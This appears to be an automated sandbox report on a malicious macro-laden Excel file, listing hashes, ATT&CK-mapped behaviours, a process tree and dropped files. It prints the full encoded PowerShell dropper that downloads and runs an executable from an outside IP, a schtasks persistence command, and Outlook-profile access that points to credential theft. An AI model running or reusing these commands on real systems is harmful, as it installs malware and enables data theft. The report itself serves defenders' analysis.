54ff9c472be10b924ae15c252e08bb870e1a1cf8361a00b74cc0d03113dd6e54

General

Target

Sample_03018200_ISO_03512328.xlsm
Size

389KB
MD5

02c95603229648cdcc202dbfcb0986d1
SHA1

3e54ebf74799844c8de1922c5cd4b60f1d8c0340
SHA256

54ff9c472be10b924ae15c252e08bb870e1a1cf8361a00b74cc0d03113dd6e54
SHA512

5c714532a453ace9c32662acbe9872a670946ef3bca244226f48d882737424a3c9561b11f2ad8b9241c64ed1d48f007b60423043b7c973df80767715f9e9b3ee

Score

10^/10

collection

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://18.159.149.5/nbl/joy/1-1/Sample_03018200_ISO_03512328.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2976	4112	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

41 1516 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Xnhhhbltuspnhydgofsx.exeupdate.exe

pid process

932 Xnhhhbltuspnhydgofsx.exe
3960 update.exe
Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

4112 EXCEL.EXE
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

flow	pid	process
41	1516	powershell.exe

pid	process
932	Xnhhhbltuspnhydgofsx.exe
3960	update.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

vbc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	vbc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	vbc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	vbc.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

43 checkip.dyndns.org
45 freegeoip.app
46 freegeoip.app
Suspicious use of SetThreadContext 1 IoCs

Processes:

Xnhhhbltuspnhydgofsx.exe

description pid process target process

PID 932 set thread context of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
43	checkip.dyndns.org
45	freegeoip.app
46	freegeoip.app

description	pid	process	target process
PID 932 set thread context of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5072 schtasks.exe

pid	process
5072	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\78467F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4112 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exevbc.exe

pid process

1516 powershell.exe
1516 powershell.exe
1516 powershell.exe
2036 vbc.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

4112 EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\78467F00\:Zone.Identifier:$DATA	EXCEL.EXE

pid	process
1516	powershell.exe
1516	powershell.exe
1516	powershell.exe
2036	vbc.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeXnhhhbltuspnhydgofsx.exevbc.exeupdate.exe

description	pid	process
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	932	Xnhhhbltuspnhydgofsx.exe
Token: SeDebugPrivilege	2036	vbc.exe
Token: SeDebugPrivilege	3960	update.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

EXCEL.EXE

pid	process
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE
4112	EXCEL.EXE

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeXnhhhbltuspnhydgofsx.execmd.exe

description	pid	process	target process
PID 4112 wrote to memory of 2976	4112	EXCEL.EXE	cmd.exe
PID 4112 wrote to memory of 2976	4112	EXCEL.EXE	cmd.exe
PID 2976 wrote to memory of 1516	2976	cmd.exe	powershell.exe
PID 2976 wrote to memory of 1516	2976	cmd.exe	powershell.exe
PID 2976 wrote to memory of 1516	2976	cmd.exe	powershell.exe
PID 1516 wrote to memory of 932	1516	powershell.exe	Xnhhhbltuspnhydgofsx.exe
PID 1516 wrote to memory of 932	1516	powershell.exe	Xnhhhbltuspnhydgofsx.exe
PID 1516 wrote to memory of 932	1516	powershell.exe	Xnhhhbltuspnhydgofsx.exe
PID 932 wrote to memory of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe
PID 932 wrote to memory of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe
PID 932 wrote to memory of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe
PID 932 wrote to memory of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe
PID 932 wrote to memory of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe
PID 932 wrote to memory of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe
PID 932 wrote to memory of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe
PID 932 wrote to memory of 2036	932	Xnhhhbltuspnhydgofsx.exe	vbc.exe
PID 932 wrote to memory of 3204	932	Xnhhhbltuspnhydgofsx.exe	cmd.exe
PID 932 wrote to memory of 3204	932	Xnhhhbltuspnhydgofsx.exe	cmd.exe
PID 932 wrote to memory of 3204	932	Xnhhhbltuspnhydgofsx.exe	cmd.exe
PID 932 wrote to memory of 2628	932	Xnhhhbltuspnhydgofsx.exe	cmd.exe
PID 932 wrote to memory of 2628	932	Xnhhhbltuspnhydgofsx.exe	cmd.exe
PID 932 wrote to memory of 2628	932	Xnhhhbltuspnhydgofsx.exe	cmd.exe
PID 3204 wrote to memory of 5072	3204	cmd.exe	schtasks.exe
PID 3204 wrote to memory of 5072	3204	cmd.exe	schtasks.exe
PID 3204 wrote to memory of 5072	3204	cmd.exe	schtasks.exe

outlook_office_path 1 IoCs

Processes:

vbc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	vbc.exe

outlook_win_path 1 IoCs

Processes:

vbc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	vbc.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Sample_03018200_ISO_03512328.xlsm"
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Bhzhhoufwr.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBYAG4AaABoAGgAYgBsAHQAdQBzAHAAbgBoAHkAZABnAG8AZgBzAHgALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAxADgALgAxADUAOQAuADEANAA5AC4ANQAvAG4AYgBsAC8AagBvAHkALwAxAC0AMQAvAFMAYQBtAHAAbABlAF8AMAAzADAAMQA4ADIAMAAwAF8ASQBTAE8AXwAwADMANQAxADIAMwAyADgALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516

C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe
"C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\update\update.exe'" /f
5⤵
- Suspicious use of WriteProcessMemory
PID:3204

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\update\update.exe'" /f
6⤵
- Creates scheduled task(s)
PID:5072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe" "C:\Users\Admin\AppData\Roaming\update\update.exe"
5⤵
PID:2628

C:\Users\Admin\AppData\Roaming\update\update.exe
C:\Users\Admin\AppData\Roaming\update\update.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe
MD5
1044474c0c3401651b09cc8886f4039f

SHA1
60e64f712184f6d9b18ed6f59a07cd16221bbbf3

SHA256
c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127

SHA512
adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b

Download Submit
C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe
MD5
1044474c0c3401651b09cc8886f4039f

SHA1
60e64f712184f6d9b18ed6f59a07cd16221bbbf3

SHA256
c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127

SHA512
adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b

Download Submit
C:\Users\Admin\AppData\Roaming\update\update.exe
MD5
1044474c0c3401651b09cc8886f4039f

SHA1
60e64f712184f6d9b18ed6f59a07cd16221bbbf3

SHA256
c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127

SHA512
adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b

Download Submit
C:\Users\Admin\AppData\Roaming\update\update.exe
MD5
1044474c0c3401651b09cc8886f4039f

SHA1
60e64f712184f6d9b18ed6f59a07cd16221bbbf3

SHA256
c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127

SHA512
adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b

Download Submit
C:\Users\Admin\Documents\Bhzhhoufwr.bat
MD5
26f4e76105e1ce65d46a488506505a8e

SHA1
ea081b9ce8b93bf0aeca01cebb2fbfae4118f341

SHA256
b87516affc3c79b900c1fdf1d9086070411c22fad2a665875e032519df22d327

SHA512
2a194c8e1dec4702aac07ec24b2804cc184418b0549b66759075fe0a23a8b959aeace549ff02c997da2efd0a7d1a123744c8abc2fa1b1c1389addf913574f916

Download Submit
memory/932-344-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/932-334-0x0000000000000000-mapping.dmp

Download
memory/1516-308-0x0000000007502000-0x0000000007503000-memory.dmp

Filesize
4KB

Download
memory/1516-326-0x0000000007503000-0x0000000007504000-memory.dmp

Filesize
4KB

Download
memory/1516-307-0x0000000007500000-0x0000000007501000-memory.dmp

Filesize
4KB

Download
memory/1516-298-0x0000000000000000-mapping.dmp

Download
memory/2036-346-0x00000000004203EE-mapping.dmp

Download
memory/2036-623-0x0000000006C30000-0x0000000006CCC000-memory.dmp

Filesize
624KB

Download
memory/2628-355-0x0000000000000000-mapping.dmp

Download
memory/2976-296-0x0000000000000000-mapping.dmp

Download
memory/3204-354-0x0000000000000000-mapping.dmp

Download
memory/3960-1114-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

Filesize
4KB

Download
memory/4112-115-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp

Filesize
64KB

Download
memory/4112-118-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp

Filesize
64KB

Download
memory/4112-119-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp

Filesize
64KB

Download
memory/4112-120-0x000001A52F550000-0x000001A52F552000-memory.dmp

Filesize
8KB

Download
memory/4112-121-0x000001A52F550000-0x000001A52F552000-memory.dmp

Filesize
8KB

Download
memory/4112-117-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp

Filesize
64KB

Download
memory/4112-116-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmp

Filesize
64KB

Download
memory/4112-122-0x000001A52F550000-0x000001A52F552000-memory.dmp

Filesize
8KB

Download
memory/5072-356-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads